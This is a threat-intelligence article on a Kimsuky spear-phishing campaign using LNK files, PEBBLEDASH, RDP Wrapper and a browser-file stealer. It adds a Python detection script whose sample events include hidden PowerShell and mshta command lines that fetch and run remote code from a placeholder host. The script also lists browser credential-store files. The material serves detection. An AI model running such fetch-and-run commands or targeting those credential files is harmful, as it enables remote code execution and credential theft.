The North Korea-linked nation-state hacking group known as Kimsuky has been tied to a new spear-phishing campaign, according to findings from the AhnLab Security Intelligence Center (ASEC).
The attacks start with phishing emails carrying a Windows shortcut (LNK) file disguised as a Microsoft Office or PDF document.
Opening the attachment triggers PowerShell or mshta.exe, a legitimate Microsoft binary designed to run HTML Applications (HTA), which in turn downloads and launches payloads from an external server.
The South Korean cybersecurity company said the attacks culminate in the deployment of PEBBLEDASH, a known trojan, and a custom build of RDP Wrapper, an open-source Remote Desktop utility.
Also deployed in the attacks is proxy malware that allows the threat actor to maintain persistent RDP communications with the infected host from an external network.
In addition, Kimsuky was observed using a PowerShell-based keylogger and a new stealer named forceCopy that is used to copy files stored in web browser directories.
"All of the paths where the malware is installed are web browser installation paths," ASEC said. "It is assumed that the threat actor is trying to bypass restrictions in a specific environment and steal the web browser's configuration files where credentials are stored."
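The two behaviours described above, an LNK that makes explorer.exe spawn mshta.exe or PowerShell to fetch remote content, and a non-browser process reaching into browser credential stores, are both detectable from ordinary endpoint telemetry. The script below is an added example written for this page, not ASEC's code or any vendor's rule. The event records are constructed, the field names (`parent`, `image`, `cmdline`, `path`) are an assumed simplified schema rather than any product's format, and the list of credential-store file names is an assumption based on common browser profile layouts.

```python
"""Detection logic for the Kimsuky tradecraft described above.

Added example, not ASEC's code. Event records are constructed and the field
names are an assumed simplified schema loosely modelled on process-creation
and file-access telemetry (e.g. Sysmon event IDs 1 and 11), not a real one.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not real captures). example.invalid is a
# reserved, non-resolving domain used as a placeholder.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://example.invalid/update.hta"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/p.ps1')"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" C:\Users\u\Documents\report.docx'},  # benign: user opens a document
    {"type": "file", "image": r"C:\Users\u\AppData\Local\Temp\fc.exe",
     "path": r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"},  # benign: the browser itself
]

# Living-off-the-land binaries the LNK is described as launching.
LOLBINS = ("mshta.exe", "powershell.exe", "pwsh.exe")
# Command-line markers of fetching or decoding remote content.
REMOTE_OR_DOWNLOAD = re.compile(
    r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|-enc",
    re.I,
)
# Assumed browser credential/key files: Chromium stores saved logins in
# "Login Data" and the DPAPI-wrapped key in "Local State"; Firefox uses
# key4.db plus logins.json.
CREDENTIAL_STORES = ("login data", "local state", "key4.db", "logins.json")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "brave.exe")


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_launch(ev: Dict[str, str]) -> bool:
    """explorer.exe (i.e. a double-clicked shortcut) spawning mshta/PowerShell
    with a URL or download/decode cue on the command line."""
    if ev.get("type") != "process":
        return False
    return (
        basename(ev["parent"]) == "explorer.exe"
        and basename(ev["image"]) in LOLBINS
        and bool(REMOTE_OR_DOWNLOAD.search(ev["cmdline"]))
    )


def credential_store_access(ev: Dict[str, str]) -> bool:
    """A process other than the browser touching a browser credential store,
    the access pattern a forceCopy-style file stealer produces."""
    if ev.get("type") != "file":
        return False
    return (
        basename(ev["path"]) in CREDENTIAL_STORES
        and basename(ev["image"]) not in BROWSERS
    )


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, evidence) pairs for every event that fires a rule."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        if suspicious_launch(ev):
            hits.append(("lolbin_from_explorer", ev["cmdline"]))
        elif credential_store_access(ev):
            hits.append(("browser_credential_store_access", ev["image"]))
    return hits


if __name__ == "__main__":
    for rule, evidence in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```

Run against the constructed events, the two LOLBin launches and the Temp-directory copy of `Login Data` fire, while the Word document and Chrome's own access to its database do not. In production the browser allow-list needs to be checked against the full image path, not just the file name, since a stealer can trivially name itself chrome.exe.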
The use of RDP Wrapper and proxy tools to commandeer the infected hosts points to a tactical shift for Kimsuky, which has historically relied on custom backdoors for this purpose.
The threat actor, also tracked as APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427 and Velvet Chollima, is assessed to be affiliated with the Reconnaissance General Bureau (RGB), North Korea's foreign intelligence service.
Active since at least 2012, Kimsuky has a track record of orchestrating tailored social engineering attacks capable of bypassing email security protections. In December 2024, the cybersecurity company Genians disclosed that the group sends phishing emails from Russian services to carry out credential theft.